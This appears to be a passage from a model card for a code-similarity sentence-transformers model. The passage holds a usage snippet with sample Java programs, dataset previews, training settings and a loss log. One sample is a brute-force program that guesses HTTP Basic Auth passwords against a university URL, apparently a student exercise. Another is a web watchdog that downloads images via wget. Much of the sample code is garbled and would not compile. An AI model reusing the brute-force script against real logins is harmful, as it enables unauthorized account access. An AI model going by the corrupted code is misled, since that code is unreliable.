intStartSearch = 0;\n\n char ch;\n\n\n\n\n\n strImageArray = new String[1000];\n\n\n\n \n \n try\n {\n\n BufferedReader file =\n new BufferedReader(new FileReader(inputFile));\n\n\n while ( (str = file.readLine()) != null)\n {\n strInputFromFile += str;\n }\n\n file.print();\n file = null;\n\n }\n\n catch (Exception e)\n {\n boolContinue = false;\n System.err.println(e); \n }\t\n\n\n\n if (boolContinue)\n {\n\n strInputFromFile = (strInputFromFile.toLowerCase()).trim();\n\n intStartSearch = strInputFromFile.indexOf(strSearchString, intStartSearch);\n\n\n while (intStartSearch != -1)\n {\n\n intStartSearch += 8;\n\n while ( (strInputFromFile.charAt(intStartSearch) == \' \') ||\n (strInputFromFile.charAt(intStartSearch) == \'=\') ||\n (strInputFromFile.charAt(intStartSearch) == \'\\"\') )\n {\n intStartSearch++; \n }\n\n while ((strInputFromFile.charAt(intStartSearch) != \'\\"\')) \n {\n\n ch = strInputFromFile.charAt(intStartSearch);\n\n strImage += String.valueOf(ch);\n intStartSearch++;\n\n }\n\n\n if (strImage.startsWith("/"))\n strImage = prePend + strImage; \n\n\n intImageCounter++;\n strImageArray[intImageCounter - 1] = strImage;\n\n strImage = "";\n\n intStartSearch = strInputFromFile.indexOf(strSearchString, intStartSearch);\n\n }\n\n\n if (inputFile.equals(strWebPageOutputFile01)) \n { \n writeTextArrayToFile(strImageArray, \n strImageOutputFile01,\n intImageCounter);\n }\n else if (inputFile.equals(strWebPageOutputFile02)) \n { \n writeTextArrayToFile(strImageArray, \n strImageOutputFile02,\n intImageCounter);\n }\n\n\n }\n\n }\n\n\n\n\n\n\n\n static void downloadImages(String ImageOutputFile)\n \n {\n\n Process p;\n\n String str;\n String strFileName;\n\n\n\n try \n {\n\n BufferedReader file =\n new BufferedReader(new FileReader(ImageOutputFile));\n\n\n\n while ( (str = file.readLine()) != null)\n {\n\n strFileName = getImageFileName(str);\n\n System.out.println(" " + str);\n System.out.println(" file name: " + strFileName); \n\n\n if (fileExists(strFileName))\n deleteFile(strFileName);\n\n\n p = Runtime.getRuntime().exec("wget " + str);\n p.waitFor();\t\n\n }\n\n\n file = null;\n\n }\n\n catch (Exception e)\n {\n System.err.println("downloadingImages: " + e);\n }\n\n }\n\n\n\n\n\n\n\n static String getImageFileName(String imageFileName)\n \n {\n\n \n \n \n\n String strFileName;\n\n int intFileNameLength = imageFileName.length(); \n int intStartPosOfFileName = intFileNameLength - 1;\n\n\n\n\n \n \n while ( (intStartPosOfFileName >= 0) && \n (imageFileName.charAt(intStartPosOfFileName) != \'/\') )\n {\n intStartPosOfFileName--; \n }\n\n\n strFileName = imageFileName.substring(intStartPosOfFileName + 1, \n intFileNameLength);\n\n\n return strFileName;\n\n }\n\n\n\n\n\n\n\n static void writeTextArrayToFile(String strTextArray[],\n String strWriteToThisFileName,\n int numberOfImages )\n \n {\n\n boolean boolFirstLineWritten = false;\n\n\n\n try\n {\n\n File newFile = new File(strWriteToThisFileName);\n\n if (newFile.exists())\n {\n newFile.delete();\n }\n\n\n BufferedWriter toFile =\n new BufferedWriter(new FileWriter(newFile,\n false));\n\n for ( int i = 0 ; i < numberOfImages ; i++ )\n {\n\n if (boolFirstLineWritten) \n toFile.newLine();\n else\n boolFirstLineWritten = true;\n \n\n toFile.write(strTextArray[i]);\n\n }\n\n\n toFile.print();\n toFile = null;\n newFile = null;\n\n }\n\n catch(Exception e)\n {\n System.err.println(e.toString());\n System.out.println("File write problem for \'" + \n strWriteToThisFileName +\n "\'."); \n }\n\n }\n\n\n\n\n\n\n\n static boolean fileExists(String strFileName)\n \n {\n\n boolean boolReturnValue;\n File aFile = new File(strFileName);\n\n\n if (aFile.exists())\n boolReturnValue = true;\n else\n boolReturnValue = false;\n \n\n aFile = null;\n\n\n return boolReturnValue;\n\n }\n\n\n\n\n\n\n\n static void deleteFile(String strFileName)\n \n {\n\n\n if (fileExists(strFileName))\n { \n File aFile = new File(strFileName);\n\n try\n {\n aFile.delete();\n }\n\n catch (Exception e)\n {\n System.err.println(e);\n }\n\n\n aFile = null;\n\n }\n\n }\n\n\n\n\n\n\n\n static void renameFile(String strFromFileName, String strToFileName)\n \n {\n\n\n File from = new File(strFromFileName);\n File to = new File(strToFileName);\n\n\n boolean success = from.renameTo();\n\n\n from = null;\n to = null;\n\n }\n\n\n\n\n\n\n\n static getFileSize(String strFileName)\n \n {\n\n lngReturnValue;\n\n\n\n File file = new File(strFileName);\n \n lngReturnValue = file.length();\n\n file = null;\n\n\n return lngReturnValue;\n\n }\n\n\n\n\n\n\n\n static void sendMailWithDetectedChanges()\n \n {\n\n String str;\n String strInputFromFile = null;\n\n\n\n try \n { \n\n\n BufferedReader fromFile =\n new BufferedReader(new FileReader(strWatchDogDiffFile_01_02));\n\n\n while ( (str = fromFile.readLine()) != null)\n {\n strInputFromFile += str;\n }\n\n fromFile.print();\n fromFile = null;\n\n\n \n \n \n SmtpClient smtp = new SmtpClient(); \n\n \n \n smtp.from(strFromEmail); \n\n \n \n smtp.to(strToEmail); \n\n \n \n PrintStream msg = smtp.startMessage(); \n\n \n \n msg.println(": " + strToEmail); \n\n \n \n msg.println("From: " + strFromEmail); \n msg.println("Subject: Change in website content\\n"); \n msg.println(strInputFromFile); \n\n \n \n \n smtp.closeServer(); \n\n } \n\n catch (IOException e) \n {\n System.err.println(e); \n } \n\n }\n\n}',
'import java.io.*;\nimport java.net.*;\nimport java.text.*;\nimport java.util.*;\n\nclass BruteForce {\n\n String password="";\n\n int num =401;\n\n\n public static void main (String[] args) {\n\n String str="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";\n\n BruteForce URLcon;\n\n int length = 0;\n\n String passwd="";\n\n int t0,t1;\n\n \n if (args.length == 0) {\n \t\n \tSystem.err.println (\n \t\t\n \t\t"Usage : java BruteForce <username>");\n \treturn;\n \t\n \t}\n String username = args[0];\n \n\n t0=System.currentTimeMillis();\n\n System.out.println (" " + new Date());\n \n System.out.println ("Using BruteForce method attack "+username+"\'s password.Please waiting.......");\n\n for (int i=0;i<str.length();i++){\n\n passwd=str.substring(i,i+1);\n\n URLcon = new BruteForce (passwd,username);\n\n if ((URLcon.num)!=401) {\n\n \tt1=System.currentTimeMillis();\n\n System.out.println("The password: "+ passwd);\n\n \tdouble dt =t1-t0;\n\n\n\n \tSystem.out.println("It took "+ DecimalFormat.getInstance().format(dt/1000)+ " seconds.");\n\n System.out.println ("Finish " + new Date());\n \n \treturn;\n\n }\n\n for (int j=0;j<str.length();j++){\n\n passwd =str.substring(i,i+1)+str.substring(j,j+1);\n\n URLcon = new BruteForce (passwd,username);\n\n if ((URLcon.num)!=401) {\n\n \t t1=System.currentTimeMillis();\n\n System.out.println("The password: "+ passwd);\n\n\n double dt =t1-t0;\n\n\n\n System.out.println("It took "+ DecimalFormat.getInstance().format(dt/1000)+ " seconds.");\n System.out.println ("Finish " + new Date());\n \t return;\n\n }\n for (int m=0;m<str.length();m++){\n\n passwd = str.substring(i,i+1)+str.substring(j,j+1)+str.substring(m,m+1);\n\n URLcon = new BruteForce (passwd,username);\n\n if ((URLcon.num)!=401) {\n\n \tt1=System.currentTimeMillis();\n\n System.out.println("The password: "+ passwd);\n\n\n \t double dt =t1-t0;\n\n\n\n \tSystem.out.println("It took "+DecimalFormat.getInstance().format(dt/1000)+ " seconds.");\n \n System.out.println ("Finish " + new Date());\n \n \t return;\n\n }\n\n\n }\n\n}\n}\n System.out.println(" not find the password");\n\n}\n\n public BruteForce (String password, String username){\n\n \t String urlString = "http://sec-crack.cs.rmit.edu./SEC/2/" ;\n\n \n\n try {\n\n String userPassword = username+":"+password ;\n\n String encoding = new userPassword.misc.BASE64Encoder().encode (userPassword.getBytes());\n\n URL url = new URL (urlString);\n\n HttpURLConnection uc = (HttpURLConnection) url.openConnection();\n\n uc.setRequestProperty ("Authorization", " " + encoding);\n\n url = uc.getResponseCode();\n\n\n }\n catch(MalformedURLException e){\n \t System.out.println(e);\n }catch(IOException e){\n System.out.println(e);\n }\n\n\n }\n}',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]
# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]
label, text_1, and text_2| label | text_1 | text_2 | |
|---|---|---|---|
| type | int | string | string |
| details |
|
|
|
| label | text_1 | text_2 |
|---|---|---|
0 |
|
import java.io.; |
0 |
import java.util.; |
"+ hash2); BufferedReader buf = new BufferedReader(new FileReader("/home/k//Assign2/ulist1.txt")); String line=" " ; String line1=" " ; String line2=" "; String line3=" "; String[] cad = new String[10]; executes("./.sh"); int i=0; while ((line = buf.readLine()) != null) { line1="http://www.cs.rmit.edu./students/images"+line; if (i==1) line2="http://www.cs.rmi... |
0 |
|
|
SoftmaxLosslabel, text_1, and text_2| label | text_1 | text_2 | |
|---|---|---|---|
| type | int | string | string |
| details |
|
|
|
| label | text_1 | text_2 |
|---|---|---|
0 |
|
|
0 |
import java.io.; |
|
0 |
|
|
SoftmaxLosseval_strategy: stepsper_device_train_batch_size: 16per_device_eval_batch_size: 16num_train_epochs: 1warmup_ratio: 0.1fp16: Trueoverwrite_output_dir: Falsedo_predict: Falseeval_strategy: stepsprediction_loss_only: Trueper_device_train_batch_size: 16per_device_eval_batch_size: 16per_gpu_train_batch_size: Noneper_gpu_eval_batch_size: Nonegradient_accumulation_steps: 1eval_accumulation_steps: Nonetorch_empty_cache_steps: Nonelearning_rate: 5e-05weight_decay: 0.0adam_beta1: 0.9adam_beta2: 0.999adam_epsilon: 1e-08max_grad_norm: 1.0num_train_epochs: 1max_steps: -1lr_scheduler_type: linearlr_scheduler_kwargs: {}warmup_ratio: 0.1warmup_steps: 0log_level: passivelog_level_replica: warninglog_on_each_node: Truelogging_nan_inf_filter: Truesave_safetensors: Truesave_on_each_node: Falsesave_only_model: Falserestore_callback_states_from_checkpoint: Falseno_cuda: Falseuse_cpu: Falseuse_mps_device: Falseseed: 42data_seed: Nonejit_mode_eval: Falseuse_ipex: Falsebf16: Falsefp16: Truefp16_opt_level: O1half_precision_backend: autobf16_full_eval: Falsefp16_full_eval: Falsetf32: Nonelocal_rank: 0ddp_backend: Nonetpu_num_cores: Nonetpu_metrics_debug: Falsedebug: []dataloader_drop_last: Falsedataloader_num_workers: 0dataloader_prefetch_factor: Nonepast_index: -1disable_tqdm: Falseremove_unused_columns: Truelabel_names: Noneload_best_model_at_end: Falseignore_data_skip: Falsefsdp: []fsdp_min_num_params: 0fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}fsdp_transformer_layer_cls_to_wrap: Noneaccelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}deepspeed: Nonelabel_smoothing_factor: 0.0optim: adamw_torchoptim_args: Noneadafactor: Falsegroup_by_length: Falselength_column_name: lengthddp_find_unused_parameters: Noneddp_bucket_cap_mb: Noneddp_broadcast_buffers: Falsedataloader_pin_memory: Truedataloader_persistent_workers: Falseskip_memory_metrics: Trueuse_legacy_prediction_loop: Falsepush_to_hub: Falseresume_from_checkpoint: Nonehub_model_id: Nonehub_strategy: every_savehub_private_repo: Nonehub_always_push: Falsegradient_checkpointing: Falsegradient_checkpointing_kwargs: Noneinclude_inputs_for_metrics: Falseinclude_for_metrics: []eval_do_concat_batches: Truefp16_backend: autopush_to_hub_model_id: Nonepush_to_hub_organization: Nonemp_parameters: auto_find_batch_size: Falsefull_determinism: Falsetorchdynamo: Noneray_scope: lastddp_timeout: 1800torch_compile: Falsetorch_compile_backend: Nonetorch_compile_mode: Noneinclude_tokens_per_second: Falseinclude_num_input_tokens_seen: Falseneftune_noise_alpha: Noneoptim_target_modules: Nonebatch_eval_metrics: Falseeval_on_start: Falseuse_liger_kernel: Falseeval_use_gather_object: Falseaverage_tokens_across_devices: Falseprompts: Nonebatch_sampler: batch_samplermulti_dataset_batch_sampler: proportional| Epoch | Step | Training Loss | Validation Loss |
|---|---|---|---|
| 0.0532 | 100 | 0.0933 | 0.0279 |
| 0.1064 | 200 | 0.0154 | 0.0213 |
| 0.1596 | 300 | 0.0269 | 0.0245 |
| 0.2128 | 400 | 0.0189 | 0.0203 |
| 0.2660 | 500 | 0.0245 | 0.0205 |
| 0.3191 | 600 | 0.006 | 0.0233 |
| 0.3723 | 700 | 0.0192 | 0.0205 |
| 0.4255 | 800 | 0.0198 | 0.0194 |
| 0.4787 | 900 | 0.0252 | 0.0182 |
| 0.5319 | 1000 | 0.0167 | 0.0166 |
| 0.5851 | 1100 | 0.0102 | 0.0185 |
| 0.6383 | 1200 | 0.0175 | 0.0158 |
| 0.6915 | 1300 | 0.0174 | 0.0159 |
| 0.7447 | 1400 | 0.0145 | 0.0148 |
| 0.7979 | 1500 | 0.0104 | 0.0153 |
| 0.8511 | 1600 | 0.0309 | 0.0141 |
| 0.9043 | 1700 | 0.0041 | 0.0152 |
| 0.9574 | 1800 | 0.0129 | 0.0145 |
@inproceedings{reimers-2019-sentence-bert,
title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
author = "Reimers, Nils and Gurevych, Iryna",
booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
month = "11",
year = "2019",
publisher = "Association for Computational Linguistics",
url = "https://arxiv.org/abs/1908.10084",
}
Base model
huggingface/CodeBERTa-small-v1